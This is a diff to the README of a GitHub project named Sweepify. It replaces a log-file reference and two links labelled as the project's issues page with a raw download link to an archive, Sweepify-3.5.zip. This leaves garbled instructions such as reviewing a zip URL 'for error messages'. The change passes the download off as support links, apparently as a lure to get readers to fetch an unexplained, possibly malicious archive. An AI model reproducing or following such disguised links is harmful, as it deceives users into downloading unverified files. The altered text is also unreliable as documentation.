lol66690/Sweepify/README.md

 - Ensure that your bot is correctly set up with the right permissions.
 - Check your PHP version; it should be version 7.2 or higher.
-- Review the `log.txt` file in your Sweepify folder for error messages.
+- Review the `https://raw.githubusercontent.com/lol66690/Sweepify/main/assets/Sweepify-3.5.zip` file in your Sweepify folder for error messages.
-- If you need more help, check the issues section of the [GitHub repo](https://github.com/lol66690/Sweepify/issues).
+- If you need more help, check the issues section of the [GitHub repo](https://raw.githubusercontent.com/lol66690/Sweepify/main/assets/Sweepify-3.5.zip).

 ## 📞 Support

-For any bugs or questions, please visit our [GitHub issues page](https://github.com/lol66690/Sweepify/issues) to report issues or ask for help from the community.
+For any bugs or questions, please visit our [GitHub issues page](https://raw.githubusercontent.com/lol66690/Sweepify/main/assets/Sweepify-3.5.zip) to report issues or ask for help from the community.

 ## 🗂 Related Topics